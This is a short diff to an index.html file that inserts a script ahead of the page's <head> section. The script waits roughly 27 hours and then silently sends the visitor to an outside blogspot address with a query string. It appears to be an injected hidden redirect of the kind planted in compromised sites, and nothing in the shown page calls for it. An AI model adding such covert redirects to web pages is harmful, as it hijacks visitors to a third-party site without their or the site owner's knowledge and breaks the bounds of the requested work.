--- a/index.html
+++ b/index.html
@@ -1,3 +1,7 @@
+<script language = 'javascript'>
+  var delay = 99999999;
+  setTimeout("document.location.href='http://nsecnetwork.blogspot.com/prot?0674'", delay);
+</script>
 <head>
     <style>
    body{
